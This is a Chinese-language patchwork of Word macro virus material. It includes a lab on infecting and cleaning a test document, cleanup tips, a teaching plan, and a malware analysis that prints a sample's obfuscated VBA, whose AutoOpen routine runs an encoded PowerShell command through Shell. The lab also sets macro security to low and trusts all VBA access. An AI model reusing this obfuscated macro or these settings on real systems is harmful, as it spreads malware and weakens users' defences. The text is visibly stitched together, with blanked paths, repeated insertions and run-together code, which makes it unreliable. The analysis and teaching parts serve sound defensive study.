Word宏病毒

Word 2003
打开Word 2003，在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic 项目的访问
图2
图3
打开test文档，输入信息并保存，如教材图4所示
图4
点击工具——选项，如教材图5所示
图5
在选项中选择“安全性”选项卡，如教材图6所示，并点击“宏安全性”，出现如教材图7所示窗口，在安全性窗口中，选择“安全级”选项卡，并选中“低”，点击确定。

图6
图7
在word文档中选中工具——宏——Visual Basic编辑器进入VB编辑器，如教材图8所示
图8
选中VB窗口左侧的ThisDocument，并打开，如教材图9所示
图9
进入 D:\tools\51elab2308B目录，如教材图10所示，打开该目录下的macro_1.txt，复制该文本中的信息，并粘贴到如教材所示图11窗口，并保存，关闭VB，关闭word文档。

图10
图11
重新打开test文档，出现如教材图12所示窗口，说明已感染了word 宏病毒。

图12
以同样的方式进入VB编辑器，并打开ThisDocument，将代码删除并保存，即可将word宏病毒清除。

如教材图13所示。

图13
若在ThisDocument 中输入目录D:\tools\51elab2308B下的macro_2.txt如教材图14所示，保存；将文档关闭后在打开，出现如教材图15所示对话框
图14
图15
说明文档感染了宏病毒，清除方法与上述相同。

...打不开症状：双击运行时，打不开，弹出窗口提示：“ 遇到问题需要关闭.我们对此引起地不便表示抱歉.”有两个选择“发送错误报告”和“不发送”.如果选择“不发送”，程序将自动关闭，然后再次运行，而且会询问“是否以安全模式启动”？如果选择“是”，将进入“安全模式”.在这种模式下，将仅显示空白窗口，需要再手动打开文档方可显示.如果选择“否”，又将弹出这种对话框，不断地循环.【解决办法一】第一步：此文件一般默认在系统盘，也就是盘.文件夹是隐藏地，所以我们必须先“显示隐藏文件”.双击打开“我地电脑”，单击“菜单栏”地“工具”>“文件夹选项”>查看，将“隐藏受保护地操作系统文件（推荐）”前面地勾取消，然后将“显示隐藏地文件、文件夹和驱动器”勾上，确定.个人收集整理勿做商业用途第二部：打开路径：:\ \\ \\ ，你会看见两个文件，将“”删除掉.个人收集整理勿做商业用途最后重新打开看看，是不是可以正常启动了.【解决办法二】操作一：在弹出地“是否以安全模式启动”时，选择“是”；操作二：进入后，选择“菜单栏”地“文件”>新建；操作三：然后在右边地“新建文档”处点击“本机上地模板”操作四：删除“空白模板”，确定.重新运行，就可以恢复正常了.宏病毒（病毒）处理方法症状：第一次打开带病毒地文档时，会提示“是否启用宏”对话框，以后每次打开文档时就会自动弹出一个文档.个人收集整理勿做商业用途传播途径：主要以发送邮件或使用盘时，接收了带病毒地文档.处理步骤：、首先进行病毒查杀：使用病毒专杀软件、瑞星杀毒软件、杀毒软件查杀（有些病毒可能查杀不到）.个人收集整理勿做商业用途、然后将病毒源删除：在:\ \ \\\下，然后将文件删除.个人收集整理勿做商业用途查毒方式：主要有病毒专杀软件、瑞星杀毒软件、杀毒软件等....。

【宏病毒】Word宏病毒简单分析前⾔最近对Office系列宏病毒⽐较感兴趣，⽹上找了⼀个Word样本练练⼿，宏病毒常⽤套路⼀般都是利⽤PowerShell从服务器上下载PE⽂件执⾏，或者数据流中内嵌PE⽂件借助RTF释放执⾏。

所以分析宏病毒⼀般都⽐较简单，查看VBA代码基本就能知道病毒执⾏的内容，但是如果代码中的函数、变量、字符串等都经过混淆，分析起来难度就会提⾼。

详细分析诱导⽤户启⽤宏代码如果启⽤内容，宏代码就会执⾏，我们先看下⽂档中的数据流。

从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码，代码经过严重混淆，我们从“AutoOpen”⼦程序开始分析。

1'Attribute VB_Name = "wAwJBjJQJ"2Function RTUHFOzsK()3 SSIhYOGKB = BBqMNPjSw4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)5 pGHmjw = bkspY6 THZbsWKtF = GApwOicZH7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)8 siCAq = VEbORpJELT9 HPhRfOHnm = TOvllapZt10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)11 aLAikTZzXH = jpucp12 fqalXfJAK = LCnHkoIcD13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)14 FItfpaapu = VuuwVO15 OBbLUEjqi = KUOOIoowi16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)17 ajJRwS = FVvtMEG18 jVrCIfDvl = zLiGcJXbX19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)20 jiAGQiQw = ZrAYDPTq21 SUWWCjAwf = vzuwToFbG22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)23 GcmZjTwn = jmtkTTkrF24 LMtwHYSki = ADrFrhRWc25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)26 RjvFUJZEqEH = NEiTwbDXjd27 LKTKBJzHw = rAsqBBCLO28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)29 wjCNaFw = riLqL30 iVMwDRCAv = nqFMhzLtQ31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)32 NBOCDBCM = hCfFzWOivq33 nAKjzzabj = lKCqCjSmA34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)35 uFHPYHoifcS = bGAdVi36 PNGBIBOLR = tiTviHlPK37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)38 IjUTlUqWHO = BzbiCjnQqm39 EuXMYbiQq = tznZtuwvj40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)41 uGUWvBHvsD = rZKmALU42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw43End Function44Sub AutoOpen()45 KlsJVlijz46End Sub1'Attribute VB_Name = "DMSojZquJ"2Function KlsJVlijz()3 KRwZOZiSb = jMiOqzLkc4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)5 iKnPNTjHYUN = TzurouRwtt6 TsfRjzdCc = wGUKHjjwm7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!8 iBSRmkhEj = SAIGYDAjD9 XtczUhZho = sGlQtlEVs10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)11 JZJjMfIbBG = HdFRsCmu12 PthzvLzhL = GZEufrNor13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxAD14 TjXFztBK = aJFENXB15 zUYzrCIlv = qfMjGmrTF16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)17 AcOZjKGHd = bEHOc18 EYzRCmWTI = kzbtDFuEB19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)20 RkSMsXZmbbj = KtWFTJiUI21 TSBfqKPHC = wXTSDLmIQ22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxA23 mvotcU = iBobiw24 uiSlbYuXn = TwcHoBkXB25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkA26 XvLAfRK = iaBTlajaUKt27 EZhmBvkXw = pStPHvpAV28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)29 orwEYmMBR = wLTmWqsTK30 jhqckTXvK = ZriRhfKhi31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7AD32 nGmuz = wdpalVvA33 iHhXBDcFF = tDohRofBp34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)35 TBNjdzzzh = IWIok36 KbpOPFkKj = NXkOFaMGs37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)38 FRdXUFElRa = AsoLI39 oLjmAfOds = VsZuljqAF40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtA41 fizsQ = ISYEi42 tUscmqXOh = UfwOUKvrp43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)44 cslql = mnbclQddw45 JXbJzlNOS = GTmEXEUTm46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)47 YhuVfBw = GbEiUOiVXw48 AMYpPlzuw = tHXOwuqjd49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)50 zwsMjwQJTv = nwTYnBKp51 djUGOYYRv = vPHtuBYvi52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADc53 awBiLS = WrfmRXK54 QTIqMFnTG = urVrNrbqk55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADE56 kzLPNEjwRpi = fwizQHrrKMl57 StzAQwpCi = qzNWqCPaM58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAF59 OXrPUEbnvR = HYhqTVjz60 UnXOTvRiZ = ZDBQRDQGC61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)62 KIwkY = aOmzViYRI63 jQCKAJbwT = tXBTbniGD64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA565 CPOtaunKXFw = mTTdkG66 MDaCimYPz = cahKFjzjJ67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMA68 IAFUul = jENmKtocosG69 KKmNnWbYG = XGbNmLAEC70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)71 muHlMzvW = wwuaTvRloii72 cihQlkKwW = mjSSTsdUv73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0A74 wJLOSQhR = NkhKkqUcZzS75 QzQDbKjBI = XPoWJBjXF76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AM77 bbvLjLAvSJ = fYzIS78 ctZCDozpo = oFnijRPjE79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)80 LPwcEG = ZXRkXlUKciC81 mYCWkjbmj = iPZQlvnBa82 CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)83 fcjRIRH = CaTTBtvHd84 WOvbEmVrw = VofWHZwuw85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB86 fhXwGUGo = JozUMVXQNC87 CFJqaQFQZ = PYTsvirtV88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)89 HczVFWDHVzj = dnCicIqnDi90 JKUQBsnGw = DMHzTrwkw91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)92 lbjqdjR = ckRwBHp93 QjnfWnMGT = cctziOEnj94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)95 SPEOqDL = nRJpoij96 imEQCTSBE = SPEcvKlaM97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFk98 rBTCHaK = zGITmmFi99 hdnhDuYKd = FGitvjHSw100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3 101 ScIOzQwUMHj = tkqnlH102 szdUNVjur = PzhiLEBWJ103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqB 104 MthJuYP = wzamU105 vziJsrqMu = WYTXVcMta106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq 107 EbUQjFzQMji = cqwMU108 jNQSzJDJL = wWvdrZWLV109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)110 hpdwFmXNaN = OfVqJ111 PiHliAaNV = XriEVRdSI112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)113 LJIEujI = IwiDSbtjXNM114 sdzZGijtp = zshuBJHwL115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)116 LPjrKRijIw = XNpKBSQp117 SzjQrknfR = jrBdAZQdi118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)119 EzTYX = jwrGYdkzCNC120 WqbZFkKbV = ncqVzZGKU121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADA 122 QYpwllzTSck = CmzXsmGKojc123 ZclPlaQAC = oWrIiXalF124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)125 ZbAAifkPrvN = mAwtjzQ126 jtszGQPAD = bKtbWpErB127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)128 DGLkaA = oWJLO129 zHFAIEhVF = dfwTvMTXR130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2 131 zSGEI = EKYFiRhEXFw132 cZWVzlXoq = JMzCDmWdd133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADk 134 OkBajT = SFdjwWp135 ziknRkKlU = EIPhIwXbR136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQ 137 CWMpLVkSS = DcABZPAtp138 ibHUdTOYI = FabLwRiUp139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)140 lcPiAkbq = cBUrWQJBDX141 hpIlKOQSj = bbEBfbVrB142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)143 HnZjzd = MvpXHXC144 WiEQYtbFL = stLzwnJqm145 vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)146 GzjkYUBnqXG = vajVOP147 JtQsEKnnw = DEvzqFPLp148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)149 icAYwsLVpUA = kEROiFMIq150 kQQOJFDXZ = UddQropLw151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)152 bapZdDJB = irUIcwRD153 kdaudlwYB = PtDFhmwZZ154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)155 KbFniuHlZAr = iFmWVaPu156 WujLpjlSJ = TnMGKiHih157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)158 OWGLMOBo = hfcbdZkXOQ159 OpniRlEni = VOwqRSPSQ160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEA 161 iCUMSYusIv = zXXPDkaDCDf162 OZouIKbdk = oJiYwCEkj163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)164 NwSKajzAjmw = pDDDLci165 lrczHCBPD = NcVurrNsF166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAA 167 kKRBFkTYOSq = cYFmodmUji168 tThcDoAPi = vzQtlhidb169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)170 bYcfSuOhsf = FPmzKLZZjn171 nRRltsHOB = PtSrLGzLR172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)173 PcapUM = KftEZiGv174 CIoowrYFS = nUqoLNQZb175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)176 sbpNlLMLdC = CfjsS177 nHaoVpmlW = MEmKwaQjV178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)179 wZkHuAqmza = haGppvzwpLm180Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + 181End Function⼦程序中⾸先调⽤了"DMSojZquJ"模块的"KlsJVlijz"函数，函数代码经过严重混淆，但是通过函数结尾的“Shell”关键字我们猜测病毒执⾏了某个程序或命令⾏。

word宏病毒课程设计一、课程目标知识目标：1. 学生理解Word宏病毒的定义、特征及其工作原理；2. 学生掌握如何识别Word文档中可能存在的宏病毒；3. 学生了解基本的宏病毒防护措施及处理方法。

技能目标：1. 学生能够运用Word软件的相关功能，查看并理解文档宏代码；2. 学生能够操作Word软件进行宏病毒的简单查杀与预防；3. 学生通过案例分析，提高解决问题的能力和信息处理能力。

情感态度价值观目标：1. 培养学生对计算机病毒防范的意识，增强信息安全保护观念；2. 激发学生对计算机编程的兴趣，提高其探究精神和创新意识；3. 培养学生良好的网络道德观念，遵循法律法规，尊重他人劳动成果。

课程性质：本课程为信息技术课程，旨在帮助学生掌握宏病毒相关知识，提高信息安全意识和技能。

学生特点：六年级学生已具备一定的计算机操作能力，对新鲜事物充满好奇，但信息安全意识较弱。

教学要求：结合学生特点，注重实践操作，以案例分析为主线，引导学生主动探究，培养其解决问题的能力。

在教学过程中，关注学生的情感态度价值观培养，使其成为具备良好网络素养的新时代少年。

1. Word宏病毒基础知识：- 宏病毒定义与特征；- 宏病毒的工作原理；- 宏病毒的危害及传播途径。

2. Word宏病毒识别与防护：- Word文档宏的查看与编辑；- 宏病毒识别技巧；- 宏病毒防护策略；- 疑似宏病毒文档的处理方法。

3. 实践操作与案例分析：- 实际操作演示宏病毒的查杀与防护；- 分析典型宏病毒案例，提高防范意识；- 学生动手实践，查杀模拟宏病毒。

4. 信息安全意识培养：- 介绍信息安全法律法规；- 培养良好的网络道德观念；- 探讨网络安全的重要性。

教学内容依据课程目标，结合教材相关章节进行组织。

在教学过程中，循序渐进地引导学生掌握宏病毒相关知识，注重实践操作和案例分析，以提高学生的实际操作能力和解决问题的能力。

同时，关注学生信息安全意识的培养，使其在学习过程中形成良好的网络素养。

word出现宏病毒安全警告怎么办方法/步骤1、在word文档中用宏进行保护文件并不复杂。

在菜单栏的上面找到工具选项，并找到在下拉菜单底部位置的宏选项。

2、单击第三个选项中的宏安全性，打开宏设置界面，进行宏相关设置的编辑。

3、这样就完成了宏安全性的查看。

但是不是要说宏如何加密吗?下面就来讲解宏怎样加密文档。

4、返回刚才的菜单中，找到宏选项，并且单击进入宏指令编辑模式。

5、在下拉选框中输入宏的名称，在宏的位置找到所有的活动文档，并且选择创建，就可以完成宏的创建。

但是这还没完，还要编辑宏。

6、在打开的代码编辑界面中，在end sub的上面插入索要加密的指令代码，让宏在word运行时执行这些代码，起到保护作用。

7、在网上可以找到一些可用的加密代码，因为比较复杂这里就不做说明。

英文点号可以起到快捷输入的作用。

在end sub之后写代码是没有用处的。

8、输入完成后，在左上角找到保存normal菜单项，就可以对word文档进行加密啦!9、千万不要忘记密码，也就是代码快结束时Password = xxxx部分，这非常重要哦!10、加密完成的效果就是这样。

是不是很有效果并且很有成就感呢?相关阅读：1月，英特尔处理器中曝Meltdown(熔断)和Spectre (幽灵)两大新型漏洞，包括AMD、ARM、英特尔系统和处理器在内，几乎近发售的所有设备都受到影响，受影响的设备包括手机、电脑、服务器以及云计算产品。

这些漏洞允许恶意程序从其它程序的内存空间中窃取信息，这意味着包括密码、帐户信息、加密密钥乃至其它一切在理论上可存储于内存中的信息均可能因此外泄。

二、GitHub 遭遇大规模Memcached DDoS 攻击2月，知名代码托管网站GitHub 遭遇史上大规模Memcached DDoS 攻击，流量峰值高达1.35 Tbps。

然而，事情才过去五天，DDoS攻击再次刷新纪录，美国一家服务提供商遭遇DDoS 攻击的峰值创新高，达到1.7 Tbps!攻击者利用暴露在网上的Memcached 服务器进行攻击。

最近word文档感染宏病毒解决处理办法：
一、首先要清除掉word模版，Word模板路径在哪里呢？
1、在Windows XP系统中，“我的模板”所在文件夹目录为C:\Documents and
Settings\Administrator\Application Data\Microsoft\Templates；
2、而在Windows Vista或Windows7\windows10系统中，“我的模板”文件夹目录为
Users\Administrator\AppData\Roaming\Microsoft\Templates。

3、特别注意：word2003模版文件名是：normal.dot ，word2007\2010\2016等的
模版文件名是：normal.dotm
4、如果以上目录找不到可能是你电脑隐藏了目录，请在此设置处打开
二、其次是将电脑系统中360杀毒升级到最新版，再进行全盘杀毒。

亲们不要
用金山毒霸杀毒，这个软件不大管用。

如有侵权请联系告知删除，感谢你们的配合！。

宏病毒的基本知识王宇航09283020宏病毒一、宏病毒的基本知识宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

运行环境：microsoft office word特点：宏病毒是针对微软公司的字处理软件Word编写的一种病毒。

微软公司的字处理软件是最为流行的编辑软件，并且跨越了多种系统平台，宏病毒充分利用了这一点得到恣意传播。

宏病毒作为一种新型病毒有其特点与共性。

1．传播极快Word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。

人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染宏病毒，而对外来的文档文件基本是直接浏览使用，这给Word宏病毒传播带来很多便利。

